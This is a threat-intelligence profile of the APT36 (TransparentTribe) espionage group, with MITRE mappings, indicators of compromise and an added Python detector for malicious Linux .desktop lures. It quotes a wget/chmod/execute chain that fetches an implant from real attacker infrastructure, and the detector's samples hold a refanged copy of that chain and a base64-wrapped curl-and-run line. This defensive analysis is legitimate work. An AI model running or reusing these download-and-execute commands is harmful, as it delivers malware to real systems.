Keypoints
- TransparentTribe (APT36) operates from Pakistan and primarily targets Indian government, military, diplomatic, and education sectors.
- Initial access vectors include spear-phishing with malicious Office/PowerPoint macros, malvertising (Google Ads promoting fake Kavach download portals), and romance/social-engineering lures delivering malicious APKs.
- They host payloads on typo-squatted .in domains, Google Drive, and infrastructure tied to IPs such as 5.189.145[.]248 and 153.92.220[.]59; Linux desktop entry files and obfuscated ELF binaries have been used for Linux targets.
- Crafted documents exploit CVE-2012-0158 (MSCOMCTL ActiveX control) and CVE-2010-3333 (Word RTF parsing) to drop the final payload; intermediate stages often invoke scripting interpreters and deobfuscation routines before running the RAT.
- Final payloads are a mix of custom and publicly available RATs—Crimson RAT, ObliqueRAT, Peppy, njRAT, CapraRAT, Android RATs, USBWorm, LimePad, etc.—with capabilities for command execution, file exfiltration, persistence, and credential theft.
- Persistence techniques observed include scheduled tasks and registry Run keys or Startup-folder entries; exfiltration occurs over the C2 channel (HTTP POST) and encrypted transfers.
MITRE Techniques
- [T1193] Spearphishing Attachment (legacy ID, now T1566.001) – Used to gain initial access via tailored emails carrying malicious documents (‘phishing emails containing malicious documents, including Microsoft Word and PowerPoint files’).
- [T1583.001] Acquire Infrastructure: Domains – Registration and use of typo-squatted .in domains and newly registered sites to host malicious installers (‘registered multiple domains on a server with the IP address 153.92.220[.]59’).
- [T1203] Exploitation for Client Execution – Crafted Office/RTF documents exploit known MSCOMCTL and Word parsing flaws when the victim opens them (‘created malicious files to exploit the CVE-2012-0158 and CVE-2010-3333 vulnerabilities to deliver the final payload’). These are document-borne exploits that run inside the user’s Office client, not attacks on an exposed service, so T1190 (Exploit Public-Facing Application) does not apply.
- [T1059.004] Command and Scripting Interpreter: Unix Shell – Execution of obfuscated wget/chmod/exec command chains to download and run binaries (‘/usr/bin/wget …; cd /tmp; chmod +x 185.elf; libreoffice /tmp/Delegation_Saudi_Arabia.pdf | ./185’).
- [T1547.001] Registry Run Keys / Startup Folder – Use of registry and startup entries to maintain persistence on Windows systems (‘may add malicious entries to the Windows registry or startup folders to achieve persistence’).
- [T1027] Obfuscated Files or Information – Use of obfuscated desktop entry files and payloads to evade detection (‘malicious desktop entry files contain obfuscated commands to download and execute malicious elf files’).
- [T1140] Deobfuscate/Decode Files or Information – Payloads include decode/deobfuscation steps prior to execution (‘may use techniques to decode or deobfuscate their malicious payloads to bypass detection’).
- [T1003] OS Credential Dumping – Theft of credentials stored on compromised hosts to support lateral movement (‘may attempt to steal credentials stored on compromised systems using tools such as Mimikatz’).
- [T1041] Exfiltration Over Command and Control Channel – Stolen data exfiltrated via C2 infrastructure and HTTP POST requests (‘may exfiltrate stolen data over their command and control infrastructure’ and ‘Exfiltration of files is conducted through HTTP POST requests’).
Indicators of Compromise
- [IP Address] C2/hosting infrastructure – 5.189.145[.]248 (used to send phishing emails and associated with BreachRAT/DarkComet/njRAT), 153.92.220[.]59 (domains registered and used to host Linux desktop entry files).
- [Download URL/Host] Malicious file hosting – hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.pdf, hxxp://103.2.232[.]82:8081/ISEPC-12-2023-Agenda-for-meeting/185 (used in Linux desktop-entry download chain).
- [File names] Dropped payloads – /tmp/Delegation_Saudi_Arabia.pdf (decoy), /tmp/185.elf (malicious ELF payload) and other staged binaries.
- [Domains/TLDs] Lures and infrastructure – Typo-squatted .in domains and Google Drive links used to host malicious installers (examples: Kavach-related fake portals promoted via Google Ads and other .in domains, and Google Drive links for malware hosting).
- [Malware/Tools] Notable payloads observed – Crimson RAT, ObliqueRAT, CapraRAT, njRAT, USBWorm, and various Android RATs (and multiple other RATs listed in the report).
TransparentTribe conducts multistage intrusions that begin with tailored lures: spear-phishing emails carrying Office (Word or PowerPoint) documents with malicious macros, malvertising (paid Google Ads pointing to attacker-registered Kavach look-alike sites), and romance/social-engineering links that deliver APKs. For Windows targets, the macros drop and execute Remote Access Trojans; for Linux targets, phishing websites serve malicious .desktop files whose Exec entries run obfuscated wget/chmod/exec sequences to fetch ELF payloads; for Android, the actors distribute APKs that request extensive permissions to enable RAT functions.
Exploitation and staging include the reuse of known Microsoft vulnerabilities (CVE-2012-0158, CVE-2010-3333) in crafted documents, obfuscation and deobfuscation routines, and scripted execution via system interpreters. A representative decoded Linux command chain observed was: “/usr/bin/wget ‘hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.pdf’ -O /tmp/Delegation_Saudi_Arabia.pdf; /usr/bin/wget ‘hxxp://103.2.232[.]82:8081/ISEPC-12-2023-Agenda-for-meeting/185’ -O /tmp/185.elf; cd /tmp; chmod +x 185.elf; libreoffice /tmp/Delegation_Saudi_Arabia.pdf | ./185”. It downloads a decoy PDF and an ELF into /tmp, marks the ELF executable, and then starts libreoffice (to display the decoy) and the ELF as one pipeline; the pipe does not feed the PDF to the implant, it merely launches both commands together so the victim sees a document while the payload runs. Note that the command as quoted saves the binary as 185.elf but executes ./185; this page’s IoC list gives /tmp/185.elf, so treat both names as file-name indicators.
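The Linux chain above can be caught at the .desktop lure itself. The following Python script is an added example (not code from the Cyble report or this page): it pulls the Exec= value out of a .desktop file, peels the obfuscation layers, splits the resulting one-liner into commands, and flags a fetch, chmod +x, run sequence while matching any URLs or hosts against this page’s IoCs. The sh -c, whitespace-padding and base64 wrappers it unwraps are assumed obfuscation styles, since the report only says the commands are obfuscated; the sample .desktop file is constructed from the command quoted above, and the second sample (with a hypothetical /update/x path on 5.189.145[.]248) exercises the base64 wrapper.

```python
"""Flag the download-and-execute chain hidden in a TransparentTribe Linux .desktop lure.
Added example, not code from the Cyble report. The sh -c, whitespace-padding and base64
wrappers it unwraps are ASSUMED obfuscation styles; the samples below are constructed."""
import base64
import os
import re
import shlex
from urllib.parse import urlparse

# IOCs from the page, kept defanged until matching time.
DEFANGED_IOCS = [
    "hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.pdf",
    "hxxp://103.2.232[.]82:8081/ISEPC-12-2023-Agenda-for-meeting/185",
    "5.189.145[.]248",
    "153.92.220[.]59",
]
DOWNLOADERS = {"wget", "curl"}
VIEWERS = {"libreoffice", "xdg-open", "evince"}  # used to open the decoy document
B64_WRAPPER = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:sh|bash)\b")

def refang(ioc: str) -> str:
    """Undo the hxxp:// and [.] defanging used in threat reports."""
    return ioc.replace("hxxp", "http").replace("[.]", ".")

IOCS = [refang(i) for i in DEFANGED_IOCS]

def exec_line(desktop_text: str) -> str:
    """Return the Exec= value from the [Desktop Entry] group of a .desktop file."""
    group = None
    for raw in desktop_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            group = line[1:-1]
            continue
        key, sep, value = line.partition("=")
        if group == "Desktop Entry" and sep and key.strip() == "Exec":
            return value.strip()
    return ""

def _tokens(cmd: str) -> list:
    try:
        return shlex.split(cmd)
    except ValueError:  # unbalanced quotes: fall back to a naive split
        return cmd.split()

def deobfuscate(cmd: str) -> str:
    """Peel sh -c '...' and echo <b64> | base64 -d | sh wrappers; collapse whitespace padding."""
    for _ in range(4):  # bounded so nested wrappers cannot loop forever
        cmd = re.sub(r"\s+", " ", cmd).strip()
        toks = _tokens(cmd)
        if len(toks) >= 3 and os.path.basename(toks[0]) in ("sh", "bash") and toks[1] == "-c":
            cmd = toks[2]
            continue
        m = B64_WRAPPER.search(cmd)
        if not m:
            break
        try:
            cmd = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # not real base64: stop unwrapping
            break
    return cmd

def analyze(cmd: str) -> dict:
    """Split a one-liner on ; | && and look for fetch -> chmod +x -> run of a staged file."""
    report = {"downloads": [], "chmod_targets": [], "executed": [], "decoys": [], "ioc_hits": []}
    for seg in re.split(r"\s*(?:\|\||&&|[;|&])\s*", deobfuscate(cmd)):
        toks = _tokens(seg)
        if not toks:
            continue
        prog = os.path.basename(toks[0])
        if prog in DOWNLOADERS:
            dest = next((toks[i + 1] for i, t in enumerate(toks[:-1]) if t in ("-O", "-o")), None)
            for url in (t for t in toks[1:] if t.startswith(("http://", "https://"))):
                report["downloads"].append((url, dest))
                host = urlparse(url).hostname or ""
                report["ioc_hits"] += [i for i in IOCS if url.startswith(i) or host == i]
        elif prog == "chmod" and len(toks) > 2:
            mode = toks[1]  # symbolic (+x) or octal (755) form with an execute bit set
            if "x" in mode or (mode.isdigit() and any(int(d) & 1 for d in mode[-3:])):
                report["chmod_targets"] += toks[2:]
        elif prog in VIEWERS:
            report["decoys"] += toks[1:]
        elif toks[0].startswith(("./", "/tmp/", "/var/tmp/", "/dev/shm/")):
            report["executed"].append(toks[0])
    report["download_and_execute"] = bool(report["downloads"] and (report["chmod_targets"] or report["executed"]))
    return report

# Constructed sample: the chain quoted on this page, wrapped in sh -c and padded with spaces.
SAMPLE_DESKTOP = """#!/usr/bin/env xdg-open
[Desktop Entry]
Type=Application
Name=Delegation_Saudi_Arabia.pdf
Exec=sh -c "/usr/bin/wget 'http://103.2.232.82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.pdf' -O /tmp/Delegation_Saudi_Arabia.pdf;        /usr/bin/wget 'http://103.2.232.82:8081/ISEPC-12-2023-Agenda-for-meeting/185' -O /tmp/185.elf; cd /tmp; chmod +x 185.elf; libreoffice /tmp/Delegation_Saudi_Arabia.pdf | ./185"
"""
# Constructed sample of the assumed base64 wrapper (the /update/x path is hypothetical).
SAMPLE_B64_EXEC = "echo %s | base64 -d | sh" % base64.b64encode(
    b"curl http://5.189.145.248/update/x -o /tmp/x; chmod 755 /tmp/x; /tmp/x").decode()

if __name__ == "__main__":
    print(analyze(exec_line(SAMPLE_DESKTOP)))
```

Run it over any .desktop file pulled from a mail attachment or a user's Downloads directory; a report with download_and_execute set, a viewer in decoys and an executable under /tmp is the lure pattern described above, and ioc_hits ties it to this page's infrastructure. The unwrapping loop is bounded and the base64 branch validates its input, so a crafted Exec line cannot make the scanner spin or crash on garbage.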
Post-compromise activity centers on persistence (scheduled tasks, Startup-folder entries, registry Run keys), credential harvesting and lateral movement, and exfiltration over the C2 channel. The group deploys a mix of custom and commodity RATs (Crimson RAT, ObliqueRAT, Peppy, njRAT, CapraRAT, various Android RATs, USBWorm, LimePad), each providing remote command execution, file discovery and exfiltration, keylogging, and C2 communication; C2 and hosting have been tied to 5.189.145[.]248 and 153.92.220[.]59. Defenders should alert on those IPs, the malicious .in domains, Google Drive links used for payload hosting, and the wget/chmod/execute sequence described above: a .desktop file or shell process that fetches into /tmp, marks the file executable, and runs it alongside a document viewer is a strong detection signal.
Read more: https://cyble.com/blog/threat-actor-profile-transparenttribe/